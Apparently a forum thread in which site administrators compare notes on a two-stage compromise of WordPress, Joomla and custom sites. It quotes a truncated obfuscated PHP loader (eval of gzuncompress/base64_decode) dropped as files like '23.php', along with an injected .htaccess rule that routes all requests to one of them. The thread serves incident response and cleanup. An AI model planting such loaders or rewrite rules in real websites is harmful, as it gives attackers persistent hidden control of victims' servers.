Sventy

interesting discussion and some clean up stuff in this thread here:

@jbekker – yes I thought about this. Or maybe to clean the incoming passwords from outdated login data, that doesn’t work anymore and have only passwords that still work.

But the “price” for this would be an extreme high detection rate. If you look around the internet – almost all discussion start because a website didn’t work anymore. Just appending a html code will brake many Scripts even such popular like WP and Joomla.

So why provoke such a high attention/detection rate?

What comes to my mind is: to divert our attention from what they are really doing. I have seen this once before: A very obvious attack, easy to detect and easy to clean up. At the same time a very smart hidden backdoor was installed, which you might not notice because you clean up the easy, obvious stuff.

Sven

Yes it starts with a Trojan – what bothers me is the 2 step approach. I don’t quite understand what the motivation is. If the Trojan sends out the passwords – why do they need the HTML injection to report the URL back? The Trojan could tell them…

@emsi – it makes sense to post here. Be it only to make clear it is not a WP epxloit (what one might think at first) – We have also Joomla, and custom coded websites affected by this.

Important Note: the attack comes in two stages. In stage one you see the html code injected as above.
About a day later I see uploads of files that have names like “23.php” or “56.php” – allways a two digit number.

Those files are start with something like:

<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ...UQ=='))); ?>

I haven’t yet decoded the binary to see what it does.

You also see an upload of a .htaccess file wit this content:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
</IfModule>

Where the binary code is being uncompressed and executed.

From what I can see on my behalf I suspect the involvement of the TR/Crypt.XPACK.Gen Trojan – but I can not yet 100% confirm it.

Sven